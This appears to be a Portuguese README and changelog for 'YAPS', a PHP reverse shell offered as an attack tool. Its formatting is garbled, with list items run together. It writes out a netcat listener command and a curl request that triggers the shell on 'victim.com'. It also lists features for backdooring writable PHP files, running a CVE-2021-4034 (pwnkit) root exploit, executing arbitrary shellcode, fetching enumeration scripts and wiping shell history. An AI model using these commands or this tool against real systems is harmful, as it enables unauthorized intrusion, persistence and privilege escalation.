
Yet Another PHP Shell - O shell reverso PHP mais completo

Sim, como o nome revela, este é mais um shell reverso PHP, um entre centenas disponíveis por aí, mas com algumas vantagens. É um único arquivo PHP contendo todas as suas funções e você pode controlá-lo através de um simples listener TCP (ex.: nc -lp 1337).
Na versão atual (1.5), suas principais funções suportam apenas sistemas Linux, mas estou planejando fazê-lo funcionar também com Windows.
Atualmente está na sua primeira versão e ainda não a testei muito, e ainda há muitas coisas que pretendo fazer e melhorar para as próximas versões (não está pronto ainda!), então por favor me avise se encontrar algum bug ou tiver alguma sugestão de funcionalidade ou melhoria. =)
!interactive)
rlwrap nc -lp <ip> <port>)curl -x POST -d "x=ip:port" victim.com/yaps.php);yaps.php?s ou yaps.php?silent para suprimir o bannerphp yaps.php ip port!help - Exibe o menu de ajuda!all-colors - Alterna todas as cores (compatível com TTY sem cor)!color - Alterna a cor do PS1 (apenas localmente, nenhuma variável de ambiente é alterada)!duplicate - Gera outra conexão YAPS!enum - Baixa o LinPEAS e LinEnum para /tmp e os deixa prontos para uso!info - Lista informações sobre o alvo (a enumeração mencionada acima)!infect - Infecta arquivos PHP graváveis com backdoors!interactive - Gera shells reversos interativos em outras portas (funciona com sudo, su, mysql, etc.)!passwd - Opção de senha (ativar, desativar, definir, modificar)!php - Escreve e executa PHP no host remoto





v1.5 - 12/02/2022
!shellcode para receber e executar um shellcode arbitrárioduplicate() (agora você pode definir uma faixa de portas)stabilize para interactivev1.4 - 04/02/2022
!pwnkit para explorar CVE-2021-4034 e gerar um shell reverso rootverify_update()v1.3.1 - 01/08/2021
v1.3 - 28/07/2021
!infect para infectar arquivos PHP com backdoors!stabilize (bugs corrigidos)v1.2.2 - 18/07/2021
v1.2.1 - 17/07/2021
v1.2 - 17/07/2021
!duplicate para gerar outro shell--update|-u)--help|-h)php yaps.php ip port)v1.1 - 12/07/2021
!all-colors para alternar as cores do terminal e funcionar com TTYs sem corexit para fechar o socket (sair do shell)!stabilize para desativar HISTSIZE e HISTFILE!infov1.0.1 - 08/07/2021
[x,y,z] para array(x,y,z) para melhorar compatibilidade com versões antigas do PHPAlgumas ideias foram inspiradas por estas ferramentas:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell
!pwnkit - Tenta explorar CVE-2021-4034 e gerar um shell reverso root!shellcode - Envia e executa shellcode no host remoto!suggester - Baixa o Linux Exploit Suggester para /tmp e o deixa pronto para uso

